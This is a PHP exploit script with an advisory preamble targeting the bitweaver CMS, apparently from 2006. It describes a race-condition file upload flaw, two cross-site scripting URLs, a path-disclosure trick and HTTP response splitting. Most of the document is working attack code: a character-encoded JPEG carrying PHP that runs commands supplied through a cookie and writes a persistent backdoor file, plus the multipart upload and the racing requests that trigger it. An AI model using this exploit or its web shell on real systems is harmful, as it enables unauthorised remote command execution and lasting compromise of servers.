#!/usr/bin/php -q -d short_open_tag=on mErrors['article_image'] = "Error during attachment of article image"; } else { $resizeFunc = ( $gBitSystem->getPreference( 'image_processor' ) == 'imagick' ) ? 'liberty_imagick_resize_image' : 'liberty_gd_resize_image'; $pFileHash['source_file'] = $tmpImagePath; $pFileHash['dest_path'] = TEMP_PKG_NAME.'/'.ARTICLES_PKG_NAME.'/'; // remove the extension $pFileHash['dest_base_name'] = $tmpImageName; $pFileHash['max_width'] = ARTICLE_TOPIC_THUMBNAIL_SIZE; $pFileHash['max_height'] = ARTICLE_TOPIC_THUMBNAIL_SIZE; $pFileHash['type'] = $_FILES['article_image']['type']; if( !( $resizeFunc( $pFileHash ) ) ) { $this->mErrors[] = 'Error while resizing article image'; } @unlink( $tmpImagePath ); ... explaination: a remote user can go to: http://[target]/[path]/articles/edit.php to submit an article to the administrator, you can attach an image there. You can submit a file like this, with double extension: suntzu1234.php.xxx a temporary copy of the file is created in temp/articles/ folder and renamed like this: temp_suntzu1234.php.xxx (see $tmpImagePath argument...) you have about 0.1 / 0.2 seconds to launch commands :), because temporary file is deleted http://[target]/[path]/temp/articles/temp_suntzu1234.php.xxx?cmd=dir this works fine on most Apache servers... note: this folder is not properly protected, we have an .htaccess file like this: order deny,allow deny from all ii) two cross site scripting vulnerabilities: http://[target]/[path_to_bitweaver]/users/login.php?error= http://[target]/[path_to_bitweaver]/articles/index.php?feedback= iii) a trick to see bitweaver "white screen of death": http://[target]/[path_to_bitweaver]/users/index.php?sort_mode=suntzuuuuuuuuuuuuu and disclose full application path, database table prefix ,among other things... iv) various http response splitting vulnerabilities, this is one: http://[target]/[path]/index.php?BWSESSION=%0d%0a[http headers] this is the exploit for i), it creates a backdoor called suntzu.php.xxx in temp/articles/ when you succeed for the first time */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $cmd="";$port=80;$proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $packet="GET ".$p."temp/articles/suntzu.php.xxx HTTP/1.0\r\n"; $packet.="User-Agent: GoogleBot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"*delim*")) { echo "Exploit succeeded...\r\n"; $temp=explode("*delim*",$html); die($temp[1]); } $shell= chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0xc0).chr(0x3c).chr(0x3f). chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72). chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72). chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b). chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65). chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30). chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65). chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f). chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67). chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x24). chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72). chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65). chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b). chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29). chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22). chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22). chr(0x3b).chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72). chr(0x75).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b). chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29). chr(0x3b).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x2a). chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22).chr(0x3b). chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).chr(0x3d).chr(0x66).chr(0x6f). chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e). chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e). chr(0x78).chr(0x78).chr(0x78).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22). chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74). chr(0x73).chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c). chr(0x3f).chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72). chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72). chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b). chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65). chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30). chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65). chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f). chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67). chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c). chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45). chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74). chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68). chr(0x65).chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f). chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64). chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f). chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69). chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x70).chr(0x61).chr(0x73). chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).chr(0x24). chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).chr(0x63). chr(0x68).chr(0x6f).chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65). chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x3f). chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x63). chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).chr(0x24).chr(0x66).chr(0x70). chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).chr(0x68).chr(0x6d).chr(0x6f). chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a). chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e).chr(0x78).chr(0x78). chr(0x78).chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b). chr(0x0d).chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10). chr(0x4a).chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01). chr(0x00).chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb). chr(0x00).chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0xff).chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00). chr(0x01).chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01). chr(0x03).chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00). chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x08).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff). chr(0xc4).chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4). chr(0x00).chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c). chr(0x03).chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00). chr(0x3f).chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9). chr(0x00).chr(0x00); /* this image has this code inside as EXIF metadata: "); fclose($fp); chmod("suntzu.php.xxx",777); ?> */ srand(make_seed()); $anumber = rand(1,99999); $data='-----------------------------7d63b53760260 Content-Disposition: form-data; name="tk" -----------------------------7d63b53760260 Content-Disposition: form-data; name="article_id" -----------------------------7d63b53760260 Content-Disposition: form-data; name="preview_image_url" -----------------------------7d63b53760260 Content-Disposition: form-data; name="preview_image_path" -----------------------------7d63b53760260 Content-Disposition: form-data; name="title" test -----------------------------7d63b53760260 Content-Disposition: form-data; name="author_name" test -----------------------------7d63b53760260 Content-Disposition: form-data; name="article_type_id" 1 -----------------------------7d63b53760260 Content-Disposition: form-data; name="rating" 3 -----------------------------7d63b53760260 Content-Disposition: form-data; name="format_guid" tikiwiki -----------------------------7d63b53760260 Content-Disposition: form-data; name="edit" test -----------------------------7d63b53760260 Content-Disposition: form-data; name="preview" Preview -----------------------------7d63b53760260 Content-Disposition: form-data; name="publishDateInput" 1 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Month" 06 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Day" 15 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Year" 2006 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Hour" 22 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Minute" 33 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expireDateInput" 1 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Month" 06 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Day" 15 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Year" 2007 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Hour" 22 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Minute" 33 -----------------------------7d63b53760260 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000 -----------------------------7d63b53760260 Content-Disposition: form-data; name="article_image"; filename="suntzu'.$anumber.'.php.xxx" Content-Type: '.$shell.' -----------------------------7d63b53760260-- '; $packet="POST ".$p."/articles/edit.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."articles/edit.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63b53760260\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: GoogleBot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; if ($proxy=="") {$ffpp=fsockopen($host,$port);} else { $parts=explode(':',$proxy); $ffpp=fsockopen($parts[0],$parts[1]); } fputs($ffpp,$packet);//we don't need output, quickly look for temporary file... $packet="GET ".$p."temp/articles/temp_suntzu".$anumber.".php.xxx HTTP/1.0\r\n"; $packet.="User-Agent: GoogleBot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd.";\r\n"; //through cookies... $packet.="Connection: Close\r\n\r\n"; for ($i=0; $i<=99; $i++) { sendpacketii($packet); if (strstr($html,"200 OK")){ echo "temp_suntzu".$anumber.".php.xxx file found...\r\n"; if (!strstr($html,"passthru")) //not executed as php code { echo "Exploit succeeded...\r\n"; $temp=explode("*delim*",$html); die($temp[1]); } else {echo "Exploit failed...\r\n";} } } fclose($ffpp); //if you are here... echo "Exploit failed..."; ?> original url: http://retrogod.altervista.org/bitweaver_13_xpl.html